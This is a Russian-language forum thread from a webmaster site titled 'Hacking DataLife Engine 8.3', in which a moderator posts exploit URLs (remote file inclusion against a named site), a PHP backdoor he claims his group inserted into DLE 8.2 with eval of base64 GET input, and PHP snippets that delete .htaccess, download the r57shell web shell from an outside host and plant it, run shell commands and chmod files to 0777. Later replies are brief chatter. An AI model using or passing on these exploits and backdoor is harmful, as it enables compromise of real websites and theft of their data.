Вход / Регистрация
Управлятор @ WFound
логин : Регистрация на сайте
пароль :    Я забыл пароль :’(
ТВ-программа
Авторизированны на проектах
Для отображения этого меню Вам необходимо авторизироваться.
WFound - DLE шаблоны, DLE модули, DLE хаки Улыбнись :)
  » WFound.Ru - CMS, сайты, новости, hi-tech, seo.
В Украине Hi-Tech Бизнес Политика Наука Авто Путешествия Спорт Экономика
Кафе и Рестораны Мода и стиль Общество Юмор Фильмы Образование История Звезды Гороскопы Кулинария REPORT
Кино Клубы Концерты События Выставки Тв-программа
Форум Каталог сайтов Блоги Фотки Чат
DataLife Engine Eleanor Drupal Joomla Danneo Другие
Новости Выставки Кинематограф Музыка Театры
Релизы Модули DLE Шаблоны DLE Хаки DLE Багфиксы DLE Сборки DLE Платное Разное
Компьютерные Журналы Видеоуроки Аудиокниги Книги Разное
Клипарты Шрифты Иконки Кисти Плагины Скрипты Photoshop Шаблоны Photoshop Обои Разное
CentOS

Автор: olyapetrova в новости:
vBulletin.v 3.7.1

Новые разделы, сервисы, которые бы Вы хотели видеть на WFound портале?

Авто
Фотогалерея
Бизнес
Файлобменник
Карты
Игры и развлечения
Туризм и путешествия
Поиск в интернете




Карта сайта
игрушки, новостной ресурс, Новые объявления про игрушки. | . скейтборды - магазин скейтборд - www.active-life.net.ua.







Взлом DataLife Engine v 8.3 (уязвимости dle, взлом DLE 8.3) 
Сообщение Сообщение #1 
Avatar

Счастливый человек
  • 119

Репутация: - 4 +
Группа: Модераторы
Сообщений: 742

Предупреждения:
0 / 5
Выкладываю несколько сплоитов для DLE 8.3:

ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca
lhost/c.txt?

http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt
?

http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L]

http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?

http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?

Сплоит для DLE 8.2:

http://skripters.com/engine/api/api.class.php?dle_config_api=[shell.txt?]

есть ещё бекдор нашего производства, был добавлен в 8.2 версию:

if($_GET['wert']==''){  
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; 

$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];  
@header("HTTP/1.0 200 OK");  
@header("HTTP/1.1 200 OK");  
@header("Cache-Control: no-cache, must-revalidate, max-age=0");  
@header("Expires: 0");  
@header("Pragma: no-cache");  
@header("Content-type: text/css; charset=".$config['charset']);  
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?versio
n_id=".$_REQUEST['versionid']."&key=".$config
1;'key']);  
if (!strlen($data)) echo $lang['no_update']; else echo $data;  
}else{  
$file=(ROOT_DIR."/engine/classes/mysql.class.php");  
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}  
$file=(ROOT_DIR."/engine/data/dbconfig.php");  
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}  
$file=(ROOT_DIR."/engine/data/config.php");  
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}  
eval(base64_decode($_GET['user_id'])); &nbs
p;
echo <<<HTML  
<HTML><body><form action="" method="post">  
<center><textarea name="text" rows="10" cols="100"></textarea>  
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body>
</HTML>  
HTML;  
if($_POST['text']!=''){eval(stripcslashes
0;$_POST['text']));  
}}


Эти коды очень помогут для заливки шелла:

Удалить файл

$dir=ROOT_DIR.'/engine/cache/.htaccess';
unlink($dir);


Заливаем шел с названием sh.php

$file = file_get_contents('http://hack-expo.void.ru/groups/rg/rel/r57shell.t
xt');
$brd = fopen('sh.php','w+');
$write =  fwrite ($brd, $file);


Показать дерикторию ../

$d = dir("../");
echo "Handle: ".$d->handle."<br>\\n";
echo "Path: ".$d->path."<br>\\n";
while (false !== ($entry = $d->read())) {
    echo $entry."<br>\\n";
}
$d->close();


Просмотрт дирректории из консоли:

passthru("cd ./; ls -la");
MD5
Код:
$str = 'jone';
echo md5($str);


Показать ROOT_DIR.\'/engine/cache\'

$dir=ROOT_DIR.'/engine/cache';
$xcv=scandir($dir);
ksort($xcv);
for($i=0;$i<count($xcv);$i++){
$qwe=substr(sprintf('%o', fileperms($dir.'/'.$xcv[$i])), -4);
if(filetype($dir.'/'.$xcv[$i])=='dir'){ $color='#FF0000'; }else{ $color='#000066'; }
echo $qwe.' - <font color="'.$color.'">'.$xcv[$i].'</font
2;<br />';
}


Записать

$dir=ROOT_DIR.'/engine/cache/sh.php';
$file = file_get_contents('http://hack-expo.void.ru/groups/rg/rel/r57shell.t
xt');
$brd = fopen($dir,'w+');
$write =  fwrite ($brd, $file);


chmod

$dir=ROOT_DIR.'/engine/cache/.htaccess';
@chmod($dir,0777);

@chmod('index.php',0777);
--------------------------------------
123кеш.., а мне уже как то насрать на мою тысячу Евро (с)


22 января 2010 23:04
ICQ: 307192 | Зарегистрирован: 27.08.2009 |
Сообщение Сообщение #2 
Avatar

WFound User
  • 68

Репутация: - 2 +
Группа: VIP
Сообщений: 171

Предупреждения:
0 / 5
crying
Ещё бы поподробнее и было б заебок! wink
--------------------------------------
«Чернобылей больше не будет» (Онотоле) (С)


22 января 2010 23:30
ICQ: 22226662 | Зарегистрирован: 6.11.2009 |
Сообщение Сообщение #3 
Avatar

WFound User
  • 68

Репутация: - 1 +
Группа: Модераторы
Сообщений: 165

Предупреждения:
0 / 5
немного погуглить и все понятно)
--------------------------------------
Господи, перезагрузи этот мир


23 января 2010 00:23
ICQ: 333777079 | Зарегистрирован: 9.01.2010 |
Сообщение Сообщение #4 
Avatar

WFound Детский Сад
  • 17

Репутация: - 0 +
Группа: Пользователи
Сообщений: 1

Предупреждения:
0 / 5
блин плз помогите вот у меня с верху 2 последнии строчки пишит что Невозможно загрузить шаблон: info.tpl что мне дальше делать помогите плз прошу пожалуйста !


5 января 2011 02:22
ICQ: -- | Зарегистрирован: 5.01.2011 |
 

1 чел. читают эту тему (гостей: 1)

Пользователей: 0


DLE, linux, quot, Wallpaper, АВТО, будет, видео, видео уроки, видеокурс, интернет, картинки, компьютер, модуль, может, Наука, новости, новый, обои, обои для рабочего стола, Образование, обучающее видео, Общество, программа, программы, Происшествия, Разное, России, сети, скачать, скачать картинки, скачать обои, скачать софт, Софт, Спорт, Ученые, шаблон, шаблона, Экономика, Юмор

Показать все теги
» Дмитрий Липскеров. Пространство Готлиба
» Соболева Лариса. Фея лжи ( Аудиокнига )
» Ольга Громыко. Профессия ведьма. Часть 2 ( Аудиокнига)
» Амброз Бирс. Глаза пантеры ( Аудиокнига )
» Владимир Бушин - Это они, Господи
» Коттон Джерри. Плейбой и его убийца ( Аудиокнига )
» Microsoft Office Pro Plus 2010 SP1 VL + Project Pro 201 ...
» Microsoft Office 2010 Professional Plus / Visio Premium ...
» Comedy Баттл. Турнир [02х17] (2012) SATRip
» Autodesk Mudbox 2012 SP2 (x86/x64/ENG)
Февраль 2012 (8)
Январь 2012 (8)
Декабрь 2011 (66)
Ноябрь 2011 (4)
Октябрь 2011 (9)
Сентябрь 2011 (6)

«    Февраль 2012    »
ПнВтСрЧтПтСбВс
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 

 Чат WFound.ru
Чат снова в строю _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
 Читать | 19 января 2011 21:39

 Пиратские сервы Lineage2
Виртуальное преступление и реальное наказание
 Читать | 15 мая 2010 21:27

 Приветствия пользователей на WFound
Наши многоуважаемые посетители! Посоветовавшись, мы решили организовать на сайте прикольные и интересные приветствия для наших любимых пользователей...
 Читать | 11 мая 2010 20:05

 За езду на игрушечном автомобиле в нетрезвом состо ...
За езду в состоянии алкогольного опьянения на детском игрушечном автомобиле для куклы Барби суд Великобритании приговорил 40-летнего жителя графства Эссекс Пола Хаттона (Paul Hutton) к лишению водительского удостоверения сроком на три года условно. ...
 Читать | 11 мая 2010 14:30

 WFound | Почта
С 10.05.2010 открыта WFound Почта. Протцесс получения ящика пока не автоматизирован. Для желающих получить адрес - отписывайтесь в комментариях, или в icq к ZLoY. Доступные домены:  Показать / Скрыть текст@wfound.ru @wfound.net @sv-news.ru
 Читать | 10 мая 2010 09:52



При цитировании, копировании и любом другом использовании материалов сайта ссылка на проект обязательна.
Администрация проекта не несет ответственности за информацию, опубликованную пользователями.
Все права защищены. За нарушение - четвертование.

Все, что может пригодиться увлеченному своим делом веб-мастеру, мы собрали для вас в разделе «Скрипты» – веб-дизайн, верстка, программирование.